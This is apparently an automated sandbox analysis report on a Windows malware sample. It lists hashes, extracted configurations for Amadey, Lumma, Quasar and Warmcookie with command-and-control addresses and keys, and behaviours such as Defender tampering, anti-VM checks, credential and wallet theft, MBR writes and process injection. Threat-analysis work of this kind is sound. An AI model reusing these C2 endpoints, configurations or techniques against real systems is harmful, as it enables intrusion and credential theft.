Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 07:00
Static task
static1
Behavioral task
behavioral1
Sample
a752fde56138218f3e1a1f44ac484dcd.exe
Resource
win10v2004-20250314-en
General
-
Target
a752fde56138218f3e1a1f44ac484dcd.exe
-
Size
1.8MB
-
MD5
a752fde56138218f3e1a1f44ac484dcd
-
SHA1
199950392575a864c33512e87d1128bd3c77a018
-
SHA256
a844b09082f62f12aa5acbe8fbb0bf8df3b2830e3dc35a37fcca55fd14257339
-
SHA512
e76ed918fe9c506b3175a8149d708c694acef095b2897f7f7dbb096df9228c2376c03cb34f82127bfc38a1b78c2689cd00be4d1631e609acc3dc667e6fbf1be7
-
SSDEEP
49152:/3rRr6dfpSns8PRzRmEJB5lSqIXULW3RItFEeN6YEGi8x9m:/dqcns8Jzk8B/DiUSWt4FGi8x9
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://navstarx.shop/FoaJSi
https://dmetalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://-targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://targett.top/dsANGt
https://hadvennture.top/GKsiio
https://1ironloxp.live/aksdd
https://vspacedbv.world/EKdlsk
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
Extracted
amadey
5.33
faec90
-
install_dir
52907c9546
-
install_file
tgvazx.exe
-
strings_key
cc9d94f7503394295f4824f8cfd50608
-
url_paths
/Di0Her478/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
warmcookie
192.36.57.50
-
mutex
62580f79-f0e4-46c9-9fe6-041328dce2b7
-
user_agent
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Signatures
-
Amadey family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/2080-304-0x000000000CA00000-0x000000000CB54000-memory.dmp family_quasar behavioral1/memory/2080-305-0x00000000051D0000-0x00000000051EA000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 5740 created 2672 5740 Abspawnhlp.exe 44 PID 6108 created 2672 6108 MSBuild.exe 44 -
Warmcookie family
-
Warmcookie, Badspace
Warmcookie aka Badspace is a backdoor written in C++.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08c15e8fbc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 49b1c089fd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 23aa9fd1d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f1dd621e77.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e7b605131d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a752fde56138218f3e1a1f44ac484dcd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 97 2080 powershell.exe 161 2080 powershell.exe 294 2080 powershell.exe 326 2080 powershell.exe 345 2080 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 12768 powershell.exe 7060 powershell.exe 4300 powershell.exe 1972 powershell.exe 2084 powershell.exe 5548 powershell.exe 6440 powershell.exe 12392 powershell.exe 2080 powershell.exe 12012 powershell.exe 976 powershell.exe 4376 powershell.exe 12948 powershell.exe 5608 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 20 IoCs
flow pid Process 322 4576 rapes.exe 322 4576 rapes.exe 322 4576 rapes.exe 322 4576 rapes.exe 26 4576 rapes.exe 187 4576 rapes.exe 264 4576 rapes.exe 299 4576 rapes.exe 50 4576 rapes.exe 50 4576 rapes.exe 100 4576 rapes.exe 104 5184 Abspawnhlp.exe 104 5184 Abspawnhlp.exe 104 5184 Abspawnhlp.exe 154 4104 svchost.exe 40 4576 rapes.exe 91 4576 rapes.exe 122 4576 rapes.exe 144 4576 rapes.exe 74 4576 rapes.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 6796 netsh.exe 8460 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 808 takeown.exe 1988 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\YZ2ve2ZW_1992\ImagePath = "\\??\\C:\\Windows\\Temp\\YZ2ve2ZW_1992.sys" tzutil.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 7 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4000 chrome.exe 3776 msedge.exe 9796 msedge.exe 9812 msedge.exe 2340 chrome.exe 3020 chrome.exe 3248 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a752fde56138218f3e1a1f44ac484dcd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 23aa9fd1d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 23aa9fd1d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f1dd621e77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 49b1c089fd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f1dd621e77.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08c15e8fbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e7b605131d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a752fde56138218f3e1a1f44ac484dcd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e7b605131d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08c15e8fbc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 49b1c089fd.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation PQPYAYJJ.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation a752fde56138218f3e1a1f44ac484dcd.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation Abspawnhlp.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation LXUZVRLG.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation PQPYAYJJ.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
pid Process 3752 w32tm.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b915fdde.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b915fdde.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c7ca228d.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c7ca228d.cmd powershell.exe -
Executes dropped EXE 47 IoCs
pid Process 4576 rapes.exe 3264 XOPPRUc.exe 3200 PQPYAYJJ.exe 1620 Abspawnhlp.exe 5376 Abspawnhlp.exe 5988 h8NlU62.exe 2248 qWR3lUj.exe 2420 HAe88WC.exe 5004 rapes.exe 6096 YGYZCmt.exe 2568 captcha.exe 2644 apple.exe 5536 261.exe 5312 261.exe 3112 LXUZVRLG.exe 2624 Abspawnhlp.exe 2600 7c4e13424a.exe 4048 890172171_x64.exe 3248 YGYZCmt.exe 4768 Rm3cVPI.exe 3200 CamMenuMaker.exe 4128 CamMenuMaker.exe 5212 p3hx1_003.exe 5532 IEYKSCXV.exe 1940 qWR3lUj.exe 1992 tzutil.exe 3752 w32tm.exe 2448 TbV75ZR.exe 7996 23aa9fd1d3.exe 8312 Updater.exe 8400 rapes.exe 6184 PQPYAYJJ.exe 8976 Abspawnhlp.exe 9152 Abspawnhlp.exe 11164 captcha.exe 13224 7IIl2eE.exe 9232 XOPPRUc.exe 7176 h8NlU62.exe 7892 Passwords.com 6952 HAe88WC.exe 11144 f1dd621e77.exe 9580 1e1e842738.exe 2432 e7b605131d.exe 8868 08c15e8fbc.exe 9560 svchost015.exe 11548 49b1c089fd.exe 8132 svchost015.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine e7b605131d.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 49b1c089fd.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine a752fde56138218f3e1a1f44ac484dcd.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 23aa9fd1d3.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine f1dd621e77.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 08c15e8fbc.exe -
Loads dropped DLL 39 IoCs
pid Process 1620 Abspawnhlp.exe 1620 Abspawnhlp.exe 1620 Abspawnhlp.exe 1620 Abspawnhlp.exe 1620 Abspawnhlp.exe 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 5376 Abspawnhlp.exe 5184 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 2624 Abspawnhlp.exe 3200 CamMenuMaker.exe 3200 CamMenuMaker.exe 3200 CamMenuMaker.exe 3200 CamMenuMaker.exe 3200 CamMenuMaker.exe 4128 CamMenuMaker.exe 4128 CamMenuMaker.exe 4128 CamMenuMaker.exe 4128 CamMenuMaker.exe 4128 CamMenuMaker.exe 5740 Abspawnhlp.exe 12920 CamMenuMaker.exe 8976 Abspawnhlp.exe 8976 Abspawnhlp.exe 8976 Abspawnhlp.exe 8976 Abspawnhlp.exe 8976 Abspawnhlp.exe 9152 Abspawnhlp.exe 9152 Abspawnhlp.exe 9152 Abspawnhlp.exe 9152 Abspawnhlp.exe 9152 Abspawnhlp.exe 5000 Abspawnhlp.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 808 takeown.exe 1988 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\F: captcha.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 f1dd621e77.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\LONE7396.htm Updater.exe -
Enumerates processes with tasklist 1 TTPs 22 IoCs
pid Process 5112 tasklist.exe 736 tasklist.exe 2644 tasklist.exe 4008 tasklist.exe 6872 tasklist.exe 6552 tasklist.exe 1948 tasklist.exe 5136 tasklist.exe 5860 tasklist.exe 1408 tasklist.exe 1320 tasklist.exe 5904 tasklist.exe 4276 tasklist.exe 2696 tasklist.exe 13024 tasklist.exe 9644 tasklist.exe 6956 tasklist.exe 4716 tasklist.exe 1892 tasklist.exe 2340 tasklist.exe 1068 tasklist.exe 5732 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1176 a752fde56138218f3e1a1f44ac484dcd.exe 4576 rapes.exe 5004 rapes.exe 7996 23aa9fd1d3.exe 8400 rapes.exe 11144 f1dd621e77.exe 2432 e7b605131d.exe 8868 08c15e8fbc.exe 11548 49b1c089fd.exe -
Suspicious use of SetThreadContext 21 IoCs
description pid Process procid_target PID 3264 set thread context of 6108 3264 XOPPRUc.exe 96 PID 5988 set thread context of 3228 5988 h8NlU62.exe 104 PID 2248 set thread context of 6120 2248 qWR3lUj.exe 107 PID 5376 set thread context of 5184 5376 Abspawnhlp.exe 108 PID 2420 set thread context of 2432 2420 HAe88WC.exe 111 PID 6096 set thread context of 3680 6096 YGYZCmt.exe 116 PID 2600 set thread context of 1960 2600 7c4e13424a.exe 274 PID 5376 set thread context of 3216 5376 Abspawnhlp.exe 121 PID 3248 set thread context of 5444 3248 YGYZCmt.exe 319 PID 2624 set thread context of 5740 2624 Abspawnhlp.exe 355 PID 1940 set thread context of 1672 1940 qWR3lUj.exe 376 PID 2448 set thread context of 6108 2448 TbV75ZR.exe 405 PID 2624 set thread context of 12144 2624 Abspawnhlp.exe 379 PID 4128 set thread context of 6224 4128 CamMenuMaker.exe 435 PID 9232 set thread context of 6192 9232 XOPPRUc.exe 542 PID 9152 set thread context of 5000 9152 Abspawnhlp.exe 536 PID 7176 set thread context of 7444 7176 h8NlU62.exe 561 PID 6952 set thread context of 8056 6952 HAe88WC.exe 578 PID 9152 set thread context of 12540 9152 Abspawnhlp.exe 579 PID 8868 set thread context of 9560 8868 08c15e8fbc.exe 585 PID 11548 set thread context of 8132 11548 49b1c089fd.exe 587 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe -
Drops file in Windows directory 24 IoCs
description ioc Process File created C:\Windows\Installer\e585510.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{2EF5B19F-6B07-454C-9A55-639BDA404CDF} msiexec.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI5649.tmp msiexec.exe File created C:\Windows\Installer\e585514.msi msiexec.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Tasks\Redstage.job 890172171_x64.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File created C:\Windows\Tasks\httpTool_alpha.job cmd.exe File opened for modification C:\Windows\Installer\e585510.msi msiexec.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job a752fde56138218f3e1a1f44ac484dcd.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 4376 powershell.exe 5608 powershell.exe -
Launches sc.exe 39 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3860 sc.exe 5924 sc.exe 1308 sc.exe 4480 sc.exe 6004 sc.exe 3212 sc.exe 2228 sc.exe 5900 sc.exe 4356 sc.exe 1172 sc.exe 5132 sc.exe 4268 sc.exe 3476 sc.exe 2300 sc.exe 4460 sc.exe 2812 sc.exe 2512 sc.exe 5828 sc.exe 5684 sc.exe 2768 sc.exe 4244 sc.exe 5284 sc.exe 3840 sc.exe 3748 sc.exe 2196 sc.exe 4248 sc.exe 5712 sc.exe 5832 sc.exe 920 sc.exe 2696 sc.exe 556 sc.exe 4368 sc.exe 1604 sc.exe 380 sc.exe 2448 sc.exe 2016 sc.exe 2120 sc.exe 3480 sc.exe 3112 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 1 IoCs
pid pid_target Process procid_target 8316 6108 WerFault.exe 405 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
